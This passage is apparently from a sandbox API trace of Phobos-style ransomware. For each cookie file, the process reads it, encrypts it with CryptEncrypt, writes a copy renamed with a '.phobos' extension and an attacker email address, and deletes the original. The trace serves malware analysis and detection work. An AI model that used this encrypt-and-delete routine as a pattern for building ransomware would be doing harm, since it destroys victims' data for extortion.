lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x122, lpOverlapped=0x0) returned 1 [0194.200] CryptDestroyKey (hKey=0xa327e8) returned 1 [0194.200] CloseHandle (hObject=0x154) returned 1 [0194.200] CloseHandle (hObject=0x134) returned 1 [0194.200] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtech[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adtech[2].txt")) returned 1 [0194.201] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0194.202] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0194.204] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=82) returned 1 [0194.204] CloseHandle (hObject=0x134) returned 1 [0194.204] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt")) returned 0x2020 [0194.204] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.205] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0194.205] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.205] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.205] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.206] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0194.206] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.206] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x52, lpOverlapped=0x0) returned 1 [0194.207] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60, dwBufLen=0x60 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60) returned 1 [0194.207] WriteFile (in: hFile=0x154, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x60, lpOverlapped=0x0) returned 1 [0194.208] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32be8) returned 1 [0194.208] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.208] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70, dwBufLen=0x70 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70) returned 1 [0194.208] CryptDestroyKey (hKey=0xa32be8) returned 1 [0194.208] WriteFile (in: hFile=0x154, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x122, lpOverlapped=0x0) returned 1 [0194.208] CryptDestroyKey (hKey=0xa327e8) returned 1 [0194.208] CloseHandle (hObject=0x134) returned 1 [0194.208] CloseHandle (hObject=0x154) returned 1 [0194.209] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt")) returned 1 [0194.210] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0194.210] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@advertising[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@advertising[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.211] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=293) returned 1 [0194.211] CloseHandle (hObject=0x154) returned 1 [0194.211] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@advertising[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@advertising[1].txt")) returned 0x2020 [0194.211] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@advertising[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@advertising[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.211] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@advertising[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@advertising[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.211] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.211] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.211] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@advertising[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@advertising[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0194.213] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0194.214] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.214] ReadFile (in: hFile=0x154, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x125, lpOverlapped=0x0) returned 1 [0194.215] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x130, dwBufLen=0x130 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x130) returned 1 [0194.215] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x130, lpOverlapped=0x0) returned 1 [0194.216] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32be8) returned 1 [0194.216] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.216] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70, dwBufLen=0x70 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70) returned 1 [0194.216] CryptDestroyKey (hKey=0xa32be8) returned 1 [0194.216] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x122, lpOverlapped=0x0) returned 1 [0194.216] CryptDestroyKey (hKey=0xa327e8) returned 1 [0194.216] CloseHandle (hObject=0x154) returned 1 [0194.216] CloseHandle (hObject=0x134) returned 1 [0194.216] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@advertising[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@advertising[1].txt")) returned 1 [0194.218] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0194.218] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0194.219] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=221) returned 1 [0194.219] CloseHandle (hObject=0x134) returned 1 [0194.219] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt")) returned 0x2020 [0194.219] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.219] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0194.219] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.219] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.219] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.220] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0194.220] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.220] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xdd, lpOverlapped=0x0) returned 1 [0194.221] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0, dwBufLen=0xe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0) returned 1 [0194.221] WriteFile (in: hFile=0x154, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe0, lpOverlapped=0x0) returned 1 [0194.222] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32be8) returned 1 [0194.222] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.222] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70, dwBufLen=0x70 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70) returned 1 [0194.222] CryptDestroyKey (hKey=0xa32be8) returned 1 [0194.222] WriteFile (in: hFile=0x154, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x122, lpOverlapped=0x0) returned 1 [0194.222] CryptDestroyKey (hKey=0xa327e8) returned 1 [0194.223] CloseHandle (hObject=0x134) returned 1 [0194.223] CloseHandle (hObject=0x154) returned 1 [0194.223] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt")) returned 1 [0194.224] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0194.224] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.224] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=513) returned 1 [0194.224] CloseHandle (hObject=0x154) returned 1 [0194.224] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt")) returned 0x2020 [0194.224] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.225] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.225] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.225] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.225] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0194.226] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0194.226] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.226] ReadFile (in: hFile=0x154, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x201, lpOverlapped=0x0) returned 1 [0194.227] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x210, dwBufLen=0x210 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x210) returned 1 [0194.227] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x210, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x210, lpOverlapped=0x0) returned 1 [0194.228] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32be8) returned 1 [0194.228] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.228] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70, dwBufLen=0x70 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70) returned 1 [0194.228] CryptDestroyKey (hKey=0xa32be8) returned 1 [0194.228] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x122, lpOverlapped=0x0) returned 1 [0194.228] CryptDestroyKey (hKey=0xa327e8) returned 1 [0194.228] CloseHandle (hObject=0x154) returned 1 [0194.228] CloseHandle (hObject=0x134) returned 1 [0194.228] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt")) returned 1 [0194.229] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0194.230] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@bing[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@bing[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0194.230] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=490) returned 1 [0194.230] CloseHandle (hObject=0x134) returned 1 [0194.230] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@bing[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@bing[1].txt")) returned 0x2020 [0194.230] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@bing[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@bing[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.230] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@bing[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@bing[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0194.231] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.231] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.231] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@bing[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@bing[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.231] CryptImportKey (in: hProv=0xa24cf8, 